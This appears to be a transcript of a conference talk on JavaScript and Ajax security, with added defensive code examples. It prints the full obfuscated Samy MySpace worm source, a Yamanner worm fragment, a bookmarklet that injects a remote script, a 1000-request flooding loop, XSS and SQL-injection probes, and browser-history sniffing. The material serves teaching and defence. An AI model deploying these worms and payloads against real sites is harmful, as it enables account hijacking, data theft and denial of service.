Pascarello_Investigating JavaScript and Ajax Security

Published in: Business, Technology
1. Investigating JavaScript and Ajax Security
   Presented By: Eric Pascarello

2. Background on Eric Pascarello
   - Author of:
     - Ajax In Action [Manning]
     - JavaScript: Your visual blueprint for building dynamic Web pages (2nd ed) [Wiley]
   - HTML and JavaScript Moderator at JavaRanch.com since 2001
   - Developer at Market10.com
   - Gives talks on Ajax around the world.

3. What we are going to investigate
   - Ajax Model
   - Classic Postback Model
   - Form Hacks
   - XSS - JavaScript Injection
   - Ajax Worms
   - Other Injections

4. One thing everyone must do: Use Common Sense!

5. What is Ajax exactly?

6. Quick Intro to Ajax
   - Ajax is Asynchronous JavaScript and XML
   - Coined by Jesse James Garrett of Adaptive Path
   - Not a language!
   - Uses JavaScript on the client and any language on the server

7. Ajax Security makes a lot of news because of:
   - Inexperienced developers working with technologies they do not understand!
     - PHP + FREE SERVERS + MySQL + AJAX = BIG SECURITY HOLES
     - JavaScript:
       - The cutting edge technology of Ctrl-C and Ctrl-V
   - Tutorials, articles, and books skipping the security aspect.
   - Tons of high profile websites using it!

8. Adaptive Path's Original Diagram

9. The Real Life Diagram of Ajax: How to explain Ajax to your non-geek friends
   - THE COLLEGE PARTY

10. The Bleak Situation

11. The Non-Ajax Solution
    - Figure out what is more important and rank the order of operations.
    - Should I clean the mess, get food, or update the outdated music collection?
    - Perform one task and do the others one after another. Hopefully I have enough time!
      - Go to the store, download music, clean the apartment so it can be trashed again.

12. The Ajax Solution
    - Do multiple things at once!
    - Hire a maid to do the cleaning!
    - Order delivery pizza!
    - And I can download new music while others do the dirty work! Ajax Clean!
13. The "Ajax Engine"
    - The XMLHttpRequest Object
      - Allows us to send information to the server without postbacks
      - Makes the request and receives the data back
      - Can be asynchronous or synchronous
    - Same Domain Policy
      - Cannot make requests to other domains

14. The XHR Object
    - The Gecko / Safari / IE7 object constructor
      - req = new XMLHttpRequest();
    - The ActiveX object for IE 5 to IE 6
      - req = new ActiveXObject("Microsoft.XMLHTTP");
    - OR
      - req = new ActiveXObject("Msxml2.XMLHTTP");

15. XHR Object Methods (method: description)
    - abort(): Stops the current request
    - getAllResponseHeaders(): Returns all header (label/value) sets
    - getResponseHeader("headerLabel"): Returns the value of a specified header label
    - open("method", "URL"[, asyncFlag[, "userName"[, "password"]]]): The heart and soul! Sets destination URL, method, and other optional attributes
    - send(content): Transmits the request
    - setRequestHeader("label", "value"): Assigns a header to be sent with the request

16. XHR open()
    - open("method", "URL", asyncFlag);
    - method = GET or POST
    - URL = Page to request
    - asyncFlag = True or False

17. send(parameters)
    - Send is like clicking the submit button on a form.
    - The parameter should be set to null or an empty string if you are not posting any information.
    - If you are posting, the name/value pairs should look like a querystring without the question mark.
      - req.send("foo=bar&ajax=123");
    - If you are using GET, append the values to the URL in the open method.
      - Remember GET has a size limitation.
    - If you want to send information, you have to add it manually.
      - No free ride like a form!

18. XHR Object Properties (property: description)
    - onreadystatechange: Event handler for an event that fires at every state change
    - readyState: Object status integer
    - responseText: String version of data returned from the server process
    - responseXML: DOM-compatible document object of data returned from the server process
    - status: Numeric code returned by the server, such as 404 for "Not Found" or 200 for "OK"
    - statusText: String message accompanying the status code

19. onreadystatechange
    - The object's only event handler.
    - It is fired only when in asynchronous mode
      - 3rd parameter is set to true in the open method
    - It is fired a total of 4 times.
    - We can assign a reference to a function or build an anonymous function for it
      - req.onreadystatechange = functionName;
      - req.onreadystatechange = function(){ //statements }

20. readyState values
    - 0 - Uninitialized
      - The initial value when a new reference to the object is created
    - 1 - Open
      - The open() method has been successfully called.
    - 2 - Sent
      - The request has been sent, but no data has yet been received.
    - 3 - Receiving
      - All HTTP headers have been received.
      - Value set right before receiving the message body
    - 4 - Loaded
      - The data transfer has been completed.
      - We can now play with the data!

21. status
    - We are looking for a value of 200
    - If you are working on the file protocol (eg: local disk, not on a web server) then you are looking for a value of 0 [zero].
    - Yes, the XMLHttpRequest object can be run off of the Active Desktop.
    - Can be read when readyState = 4

22. Basic Example of code
    var req = GetXHRObject();
    req.open("POST", "secure.aspx", true);
    req.onreadystatechange = finishRequest;
    req.send("foo=bar&ajax=123");
    - BasicExample1.html
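The slides show the constructors, the readyState values and the status rule but leave the helper (GetXHRObject) and the completion handler (finishRequest) out. The following is an added example, not the presenter's code, that puts slides 14 to 22 together: a constructor fallback in the order slide 14 lists, a status check that accepts 200 on the web and 0 on the file protocol, and a handler that only reads the response at readyState 4. Node has no XMLHttpRequest, so a constructed FakeXHR (an assumption of this example) stands in for the browser object when the script is run offline; getXHRObject, isSuccessStatus, sendRequest and demo are this example's own names.

```javascript
// Added example: a minimal XHR helper built from the rules on slides 14-21.
// FakeXHR is a constructed stand-in for the browser's XMLHttpRequest so the
// file runs under Node; in a page you would pass `window` to getXHRObject.

// Slide 14: native object first (Gecko/Safari/IE7), then the IE5/6 ActiveX ids.
function getXHRObject(root) {
  if (typeof root.XMLHttpRequest === 'function') {
    return new root.XMLHttpRequest();
  }
  if (typeof root.ActiveXObject === 'function') {
    var progIds = ['Msxml2.XMLHTTP', 'Microsoft.XMLHTTP'];
    for (var i = 0; i < progIds.length; i++) {
      try { return new root.ActiveXObject(progIds[i]); } catch (e) { /* try the next id */ }
    }
  }
  return null; // no transport available in this environment
}

// Slide 21: success is status 200 over HTTP; a file: URL reports status 0.
function isSuccessStatus(status, url) {
  if (url.indexOf('file:') === 0) { return status === 0; }
  return status === 200;
}

// Slides 19-20: one handler, fired on every state change; only act at 4.
// onDone receives (ok, responseText).
function sendRequest(req, method, url, body, onDone) {
  req.open(method, url, true);
  req.onreadystatechange = function () {
    if (req.readyState !== 4) { return; }
    onDone(isSuccessStatus(req.status, url), req.responseText);
  };
  if (method === 'POST') {
    // Slide 17: POST bodies look like a querystring, so label them as such.
    req.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
  }
  req.send(method === 'POST' ? body : null);
}

// Constructed stand-in: walks readyState 1 -> 2 -> 3 -> 4 synchronously and
// answers with the canned status and body it was created with.
function FakeXHR(status, responseText) {
  this.readyState = 0; this.status = 0; this.responseText = '';
  this.headers = {}; this.sentBody = undefined;
  this._status = status; this._text = responseText;
}
FakeXHR.prototype.open = function (method, url) {
  this.method = method; this.url = url; this.readyState = 1;
};
FakeXHR.prototype.setRequestHeader = function (name, value) { this.headers[name] = value; };
FakeXHR.prototype.send = function (body) {
  this.sentBody = body;
  var self = this;
  [2, 3, 4].forEach(function (state) {
    self.readyState = state;
    if (state === 4) { self.status = self._status; self.responseText = self._text; }
    if (self.onreadystatechange) { self.onreadystatechange(); }
  });
};

// Push one POST (the slide-22 shape) through the helper and report the outcome.
function demo(status, text) {
  var result = { ok: null, text: null, sentBody: undefined };
  var req = new FakeXHR(status, text);
  sendRequest(req, 'POST', 'secure.php', 'foo=bar&ajax=123', function (ok, responseText) {
    result.ok = ok; result.text = responseText;
  });
  result.sentBody = req.sentBody;
  return result;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(demo(200, 'server says hello'));
}
```

Because the handler ignores every state but 4, the three earlier firings that slide 19 counts do nothing; the status check happens once, with the response fully available.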
23. I CAN VIEW THE SOURCE
    - I can see the page that it is requesting from the JavaScript code!
    - I can see the parameters being sent!
    - I can see the validation!
    - I can see the Business Logic!
    - I can rule the world!

24. Before We Surrender to Fear
    - Let us look at the classic postback and Ajax models in detail

25. What is Different?
    - Ajax POST
      var req = GetXHRObject();
      req.open("POST", "secure.php", true);
      req.onreadystatechange = finishRequest;
      req.send("foo=bar&ajax=123");
    - Regular Form POST
      <form action="secure.php" method="POST">
      <input type="text" name="foo" value="bar">
      <input type="hidden" name="ajax" value="123">
      <input type="submit" name="sub1">
      </form>

26. A Web 2.0 Web Site

27. Major Cause Of Security Concerns
    - Ajax model uses WebServices
      - Legacy or New
      - Return HTML/TEXT/JSON/XML/ETC
    - More Ajax Functionality = More WebServices = More places to attack
      - Just need to forget one thing to make a new hole
    - Yes, you can use the XMLHttpRequest Object to make requests without the user's knowledge.
      - We can also use images, iframes, frames, popup windows.

28. Major Cause Of Security Concerns
    - Business Logic
    - Building Proxy Services to talk to outside domains
    - Displaying User Content
      - Tags, forums, blogs, comments, etc

29. Grandma is a Hacker
    - Everyone is giving you bad data.
    - Everyone is trying to hack you
    - Everyone wants to cause a DOS attack on your server!
    - VALIDATE ON THE SERVER!

30. Business Logic Security
    - JavaScript is basically open source.
    - Use JavaScript as the rendering engine
    - Validate the info on the server!
      - Use client-side validation as a mechanism to save user time and bandwidth
    - JavaScript obfuscation is easily reversed! Don't waste your money!

31. The First Get Some Common Sense Award Goes To:
    - A tutorial on Ajax to display data into a textarea
      function getOnlineClass()
      {
      var url = 'http://localhost/MyOnlineClass?sql=SELECT* from LOP FOR XML AUTO &root=DSLOP';
      http.open("GET", url, true);
      http.onreadystatechange = useHttpResponse;
      http.send(null);
      }
    - I wish I would have made this up!

32. So You Think Your Form Is Safe?
    - Example
    - The address bar is our friend for wreaking havoc!
    - javascript:yourStatements;void(0);
    - Add an external JavaScript file!
      - javascript:var a=document.createElement("script");a.src="http://url/foo.js";document.body.appendChild(a);void(0);

33. Hidden Fields Are Editable?
    - The Bookmarklet and the Example
    - Bookmarklets make it easy to execute code instead of manually adding it to the address bar.
    - What is a bookmarklet?
      - JavaScript statement(s) stored in a favorites link!
    - How can I do this? Create a link on a webpage, save the page, open it, right click on the link, add to favorites.
      - <a href="javascript:alert(new Date());void(0);">Show Time</a>

34. Who Needs Server-Side Validation When We Have Client-Side Checks?
    - Example
    - Why waste time disabling JavaScript when we can just override the annoying function!
    - Set event handlers, functions, variables from the status bar!
35. Simple Scripted Attacks On A Server
    var req = new Array();
    for(var i = 0; i<1000; i++){
        req[i] = GetXHRObject();
        req[i].open("POST", "secure.aspx", true);
        req[i].onreadystatechange = function(){};
        req[i].send("foo=" + i);
    }

36. Is This A Vulnerability? YES or NO

37. What is your browser telling others about you?
    - The advertiser's dream, the health insurance company's dream, your snooping boss's dream JavaScript.
    - The links are telling us where we have been!
    - Example: Is it a vulnerability or a feature?

38. So with some JavaScript we can test where you have been
    - Targeted advertising for geeks, gamers, pet owners, sports fans, porn lovers, etc.
    - Medical privacy: look to see if you have been on cancer sites, looking at sites on heart conditions, etc.
    - Your company can check to see if you are doing online shopping without installing loggers!
    - Scan for Google searches
      - Only problem: caps matter!
        - http://www.google.com/search?q=Eric+Pascarello
        - http://www.google.com/search?q=eric+pascarello

39. Let Us Now Look At XSS
    - Cross Site Scripting (XSS) allows malicious people to inject HTML, JavaScript, PHP, PERL, CSS, etc. into a Web page.
    - Gets around the same domain policy
    - Allows injection of browser vulnerability code
    - Allows people to steal information
    - Can create really annoying for-loop alert attacks!

40. The Second Get Some Common Sense Award Goes To:
    - Ask.com
    - They allow you to save your preference settings on their site with a form. Problem is, it is a GET!
    - http://www.ask.com/webprefs?addr1=&addr2=&qsrc=106&pu=100&padlt=1&pcn=FR&psave=Save+my+settings
    - The link will change the settings on their site to show 100 results, change the adult filter, country, etc.
    - Don't update settings with GET
    - Set a hidden iframe/image with this URL and you can change the settings of everyone who comes to your web site.
    - The Google Toolbar used to have this same problem when it was first implemented!
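Slides 29 to 34 say to validate on the server because hidden fields and client-side checks are under the user's control, and slide 40 says never to change settings on a GET because an image or hidden iframe on any site can fire that URL. The following added example, which is not the presenter's code and not Ask.com's, is a settings handler that enforces both rules on the server side: it refuses GET, requires a per-session token like the hidden hash/hashcode value that Samy's worm had to scrape before it could post, and whitelists every field and value so that an edited hidden field or a hand-built XMLHttpRequest gets the same treatment as a visible input. Requests are plain objects constructed here rather than real HTTP traffic; ALLOWED, newSessionStore and updatePrefs are this example's own names, and the session and token values are made up.

```javascript
// Added example: server-side handling of a preferences form (slides 29-34, 40).
// Requests are constructed objects { method, cookies, body }, not real HTTP.

// Every accepted field and value is fixed on the server; the client never
// decides what is valid (slide 56: whitelist).
var ALLOWED = {
  resultsPerPage: [10, 20, 50, 100],
  adultFilter: ['on', 'off'],
  country: ['US', 'FR', 'DE']
};

// Constructed session store: one logged-in session holding the anti-forgery
// token the server issued when it rendered the form.
function newSessionStore() {
  return {
    'sess-abc': { token: 'tok-7f3a', prefs: { resultsPerPage: 10, adultFilter: 'on', country: 'US' } }
  };
}

function updatePrefs(sessions, req) {
  // Slide 40: a settings change is a state change, so it never rides on GET.
  // A hidden <img> or iframe on another site can only issue GETs.
  if (req.method !== 'POST') {
    return { status: 405, error: 'settings changes must use POST' };
  }
  var sid = req.cookies && req.cookies.sid;
  var session = sid && sessions[sid];
  if (!session) { return { status: 401, error: 'no session' }; }

  // The token must match the one issued to this session. A request forged
  // from another origin carries the cookie but cannot know the token.
  var body = req.body || {};
  if (body.token !== session.token) {
    return { status: 403, error: 'missing or wrong token' };
  }

  // Validate every field against the whitelist, ignoring where it came from:
  // visible input, hidden input, bookmarklet-edited field or raw XHR body.
  var updated = {};
  for (var field in body) {
    if (field === 'token') { continue; }
    if (!ALLOWED.hasOwnProperty(field)) {
      return { status: 400, error: 'unknown field: ' + field };
    }
    var value = field === 'resultsPerPage' ? Number(body[field]) : body[field];
    if (ALLOWED[field].indexOf(value) === -1) {
      return { status: 400, error: 'value not allowed for ' + field };
    }
    updated[field] = value;
  }
  // Only commit once everything has passed, so a bad request changes nothing.
  for (var k in updated) { session.prefs[k] = updated[k]; }
  return { status: 200, prefs: session.prefs };
}

if (typeof require !== 'undefined' && require.main === module) {
  var store = newSessionStore();
  // The slide-40 shape: a GET carrying the settings, as an <img src> would send.
  console.log(updatePrefs(store, { method: 'GET', cookies: { sid: 'sess-abc' },
    body: { resultsPerPage: '100', token: 'tok-7f3a' } }));
  console.log(updatePrefs(store, { method: 'POST', cookies: { sid: 'sess-abc' },
    body: { resultsPerPage: '100', country: 'FR', token: 'tok-7f3a' } }));
}
```

The order of the checks matters: method first, then session, then token, then field validation, so an unauthenticated or forged request is rejected before any user-supplied value is even looked at.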
41. Biggest Offenders in XSS
    - Web pages that use
      - Search Pages
      - Guestbooks
      - RSS Readers
      - Blog Comments
      - Web based chat/games
      - Error Pages
    - Anywhere a user can insert data and it is redisplayed without removing or escaping the user's input!
    - Example time with a popular website's search! (link not included!)

42. Test For JavaScript Injection
    - Step 1: type <script>alert("hi");</script> into any field on a page.
    - Step 2: Submit the page
    - Step 3: If you see the alert, you got success! If no alert, continue
    - Step 4: View the source of the page and look for the code you added
    - Step 5: See if they are escaping everything correctly.
    - Step 6: Try the injections on the next slide
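Slide 41 names the root cause (user input redisplayed without escaping) and slide 42's step 4 checks for it by looking for the probe verbatim in the page source. The following added example, not the presenter's code, shows the vulnerable render beside the fixed one and runs slide 42's own probe string through both. escapeHtml, attrValue, renderUnsafe, renderSafe, renderSafeForm and probeEchoedRaw are this example's names; the search page markup is constructed for the illustration.

```javascript
// Added example: output escaping for reflected input (slides 41-42).
// The probe is the string slide 42 types into a field.
var PROBE = '<script>alert("hi");</script>';

// Characters that can open a tag, close an attribute or start an entity.
var ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, function (ch) { return ESCAPES[ch]; });
}

// Attribute values need escaping *and* quoting; an unquoted attribute can be
// terminated by a space, so always emit the quotes yourself.
function attrValue(text) {
  return '"' + escapeHtml(text) + '"';
}

// The "biggest offender" pattern on slide 41: the query goes straight back
// into the markup, so whatever the user typed becomes part of the page.
function renderUnsafe(query) {
  return '<p>Results for: ' + query + '</p>';
}

// Same page with the query escaped before it is redisplayed.
function renderSafe(query) {
  return '<p>Results for: ' + escapeHtml(query) + '</p>';
}

// The query echoed into a form field, the other common place it reappears.
function renderSafeForm(query) {
  return '<input type="text" name="q" value=' + attrValue(query) + '>';
}

// Step 4 of slide 42 as a check: is the probe still there verbatim, i.e. would
// a browser parse it as a script element rather than as text?
function probeEchoedRaw(html, probe) {
  return html.indexOf(probe) !== -1;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('unsafe echoes probe raw:', probeEchoedRaw(renderUnsafe(PROBE), PROBE));
  console.log('safe echoes probe raw:  ', probeEchoedRaw(renderSafe(PROBE), PROBE));
  console.log(renderSafe(PROBE));
  console.log(renderSafeForm('say "hi"'));
}
```

The escape table is for HTML text and quoted attribute values only; input placed inside a script block, a URL or a CSS property needs the encoding rules of that context, which is why slide 42's step 5 says to check that everything is escaped correctly rather than just something.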
43. Cross Site Scripting Cheat Sheet, esp. for filter evasion
    - http://ha.ckers.org/xss.html
    - Website has a long list of ways to get past filters.
    - Spend some time and go through the list!

44. Combine Visited Links with XSS
    - So let's say we have a list of XSS hacks we know about. Let's say Bank MoneyBags has an XSS hole.
    - A surfer checks their balance at BankMoneyBags.com and did not sign out. He just surfed away.
    - The surfer went to a site where this visited-links code was.
    - A positive match was found for the bank link; the XSS link is fired into an iframe / pop-up window / image.
    - And the money is now in a Swiss account!

45. What can be done?
    - Add key listeners and send data to outside servers.
    - Change user names, passwords, preferences
    - Sniff out and steal sensitive data
    - Annoy users with infinite alert loops!
    - Send email
    - Add posts to forums
    - How much damage can Ajax plus XSS do? We are talking about JavaScript!

46. Real Life JavaScript Injections with Ajax!
    - Samy [ http://en.wikipedia.org/wiki/Samy_(XSS) ]
      - MySpace.com
      - Ajax based worm that added a user to friends lists
      - October 4, 2005
      - 20 Hours
      - Over 1 million users had been affected
      - Flaw was based on a CSS background image
47. The code of Samy
    <div id=mycode style="BACKGROUND: url('java script:eval(document.all.mycode.expr)')" expr="var B=String.fromCharCode(34);var A=String.fromCharCode(39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromURL(AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return AS}var J;var AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if(location.hostname=='profile.myspace.com'){document.location='http://www.myspace.com'+location.pathname+location.search}else{if(!M){getData(g())}main()}function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV){var N=new String();var O=0;for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST'){J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');J.setRequestHeader('Content-Length',BK.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes','</td>');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS['interest']=AG;J=getXMLObj();httpSend('/index.cfm?fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}function postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Submit';AS['interest']=AG;AS['hash']=getHiddenParameter(AU,'hash');httpSend('/index.cfm?fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}function processxForm(){if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to Friends';httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}"></DIV>
48. Samy Injection Highlight
    <div id=mycode style="BACKGROUND: url('java script:eval(document.all.mycode.expr)')" expr="var B=String.fromCharCode(34
    - This injection is listed on http://ha.ckers.org/xss.html (Scroll past the halfway point on the page to see it!)

49. Yahoo gets attacked!
    - Yamanner [ http://en.wikipedia.org/wiki/Yamanner ]
      - Yahoo! Mail worm
      - June 12, 2006
      - Sent users' address books to a remote server
      - <img src='http://us.i1.yimg.com/us.yimg.com/i/us/nt/ma/ma_mail_1.gif' target=""onload="var http_request = false;
      - Have a link to the full code on my blog: http://radio.javaranch.com/pascarello/2006/06/13/1150210232222.html

50. JavaScript Port Scanning?
    - JavaScript port scanning can be done!
      - http://www.spidynamics.com/assets/documents/JSportscan.pdf
    - General summary from the white paper
      - Code gets injected into an intranet web page
      - Every server installation has default images
      - JavaScript scans IP ranges for the defaults
      - If the image has a width/height, we know the server type and IP address.
      - Post data back to an outside server

51. JSON Injection
    - JavaScript Object Notation (normally preferred over the XML format)
    - Can bypass the Cross Site Scripting restrictions
    - http://www.pascarello.com/examples/JsonYahooExample.html
    - Problem with this: the code is eval()'d / injected onto the page to make it usable for JavaScript.
      - You have to trust that your source does not embed other code!
      - Preferred method is to loop through the data.
      - Check out JSON.org for more information!
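Slide 51's problem is that eval() turns a JSON reply into an object by executing it, so a reply from an untrusted or tampered source can carry a statement along with the data. The following added example, not the presenter's code, puts the eval habit beside a strict parser and feeds both a constructed good reply and a constructed tampered one. JSON.parse is native in every current browser (the json.org parser the slide points to filled that role at the time); parseWithEval, parseStrict, fetchResults, GOOD_REPLY, TAMPERED_REPLY and sideEffects are this example's own names, and the tampered reply only flips a flag so the difference is observable offline.

```javascript
// Added example: eval() versus strict parsing of a JSON reply (slide 51).
// Both replies are constructed for the illustration.

// A well-formed reply, as a trustworthy service would send it.
var GOOD_REPLY = '{"results":[{"title":"Ajax In Action","url":"http://www.manning.com/crane"}]}';

// A reply from a source that embedded other code: it still yields the
// expected object, but as a comma expression that first runs a statement.
// The statement here only flips a flag; eval would run anything in its place.
var sideEffects = { ran: false };
var TAMPERED_REPLY = 'sideEffects.ran = true, {"results":[]}';

// The slide-51 habit: wrap in parentheses and evaluate as JavaScript.
function parseWithEval(text) {
  return eval('(' + text + ')');
}

// Strict parsing: JSON.parse accepts only data literals and throws a
// SyntaxError on anything else, so no code in the reply can run.
function parseStrict(text) {
  return JSON.parse(text);
}

// "Loop through the data" (slide 51): copy only the fields the page expects
// into fresh objects, so extra or odd fields in the reply never reach the DOM.
function fetchResults(reply, parser) {
  try {
    var data = parser(reply);
    var out = [];
    var list = (data && data.results) || [];
    for (var i = 0; i < list.length; i++) {
      out.push({ title: String(list[i].title), url: String(list[i].url) });
    }
    return { ok: true, results: out };
  } catch (e) {
    return { ok: false, error: e.name };
  }
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('eval on tampered reply:', fetchResults(TAMPERED_REPLY, parseWithEval),
              'flag set:', sideEffects.ran);
  sideEffects.ran = false;
  console.log('strict on tampered reply:', fetchResults(TAMPERED_REPLY, parseStrict),
              'flag set:', sideEffects.ran);
}
```

The telling point is that the eval path reports success: the data looked fine, and the extra statement ran silently. The strict parser fails loudly instead, which is the behaviour you want on a reply you did not generate yourself.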
52. Other Injections
    - SQL Injection
      - Quick test: in a URL, insert ' into the querystring and see if you get an error message! …com?ID=314'159
    - CSS Injection
      - Change the cached CSS file on the local machine! Screw with your friends: Digg is now pink! Hide the log in fields, move elements around!
    - XML/SOAP
      - The page can be loaded with bad data, or bad data can be sent to the server!
    - DOM Injection
      - Additional elements can be added, removed, changed, etc.
    - Cookies
      - Delete, add, change, and see what happens to the sessions!

53. Same Domain Policy Workaround: Proxy!

54. What is bad about this?
    - Inject JavaScript code onto the page.
      - Free data mining service with unlimited access!
      - Most proxy services have limited access unless you have good relations!
    - DOS attacks
      - Remember that Ajax for-loop making requests!
      - DOS the site; the proxy thinks that the server is attacking them.
      - The rest of the users on the site lose the functionality
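The for-loop on slide 35 fires a thousand XMLHttpRequests from one page, and slide 54 shows the proxy variant, where the same burst makes the outside service see your server as the attacker and cut everyone off. The following added example, which is not the presenter's code, is a per-client token-bucket limiter that a server would place in front of the Ajax endpoint and the outbound proxy, replayed against a constructed burst in the slide-35 shape. TokenBucket and simulateBurst are this example's names; the capacity, refill rate, client ids and timestamps are made up.

```javascript
// Added example: per-client token-bucket rate limiting (slides 35 and 54).
// Each client gets a bucket of `capacity` tokens that refills at
// `refillPerSecond`; a request spends one token or is rejected.
function TokenBucket(capacity, refillPerSecond) {
  this.capacity = capacity;
  this.refillPerSecond = refillPerSecond;
  this.buckets = {};   // clientId -> { tokens, last }
}

// Returns true if the request may proceed, false if the client is over budget.
// nowMs is passed in so the logic is deterministic and testable offline.
TokenBucket.prototype.allow = function (clientId, nowMs) {
  var b = this.buckets[clientId];
  if (!b) {
    b = this.buckets[clientId] = { tokens: this.capacity, last: nowMs };
  }
  // Credit the tokens earned since the last request, never beyond capacity
  // and never negative if a clock runs backwards.
  var elapsed = Math.max(0, nowMs - b.last) / 1000;
  b.tokens = Math.min(this.capacity, b.tokens + elapsed * this.refillPerSecond);
  b.last = nowMs;
  if (b.tokens >= 1) { b.tokens -= 1; return true; }
  return false;
};

// Replay the slide-35 pattern: one client fires n requests spread evenly
// over burstMs milliseconds. A real server would key clients by session or
// source address; here the id is just a label.
function simulateBurst(limiter, clientId, n, burstMs) {
  var allowed = 0, rejected = 0;
  for (var i = 0; i < n; i++) {
    var t = Math.floor(i * burstMs / n);
    if (limiter.allow(clientId, t)) { allowed++; } else { rejected++; }
  }
  return { allowed: allowed, rejected: rejected };
}

if (typeof require !== 'undefined' && require.main === module) {
  // 20 requests of burst, then 5 per second sustained.
  var limiter = new TokenBucket(20, 5);
  console.log('1000 requests in 2 s from one client:', simulateBurst(limiter, 'client-a', 1000, 2000));
  console.log('another client is unaffected:', limiter.allow('client-b', 1999));
}
```

With a capacity of 20 and a refill of 5 per second, the two-second burst gets roughly 30 requests through and the rest are rejected immediately, while a second client keeps its full budget; that is the property that keeps one user's loop, or one abusive page behind your proxy, from taking the feature away from everyone else (slide 54).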
55. Other Tools
    - Firefox Extensions
      - Firebug – view the XMLHttpRequests
      - Selenium – Record scripts and replay them!
      - JSView – See all JavaScript/CSS with a click
      - Modify Headers – (what the name implies!)
      - NoScript – Turn off or limit scripts
    - Fiddler and other proxies – Watch all traffic

56. Quick Summary
    - Ajax adds more attack vectors
    - Do what you have always done on the server!
      - Keep the business logic on the server
      - Validate on the server
        - Whitelist / Blacklist
      - Check for / remove injections
    - Remember that proxies can be abused!
    - Use Common Sense

57. Questions
    - Email: [email_address]
    - Blog: http://radio.javaranch.com/pascarello
    - Forums: http://saloon.JavaRanch.com
    - Ajax In Action: http://www.manning.com/crane
    - Need a Job? http://www.market10.com
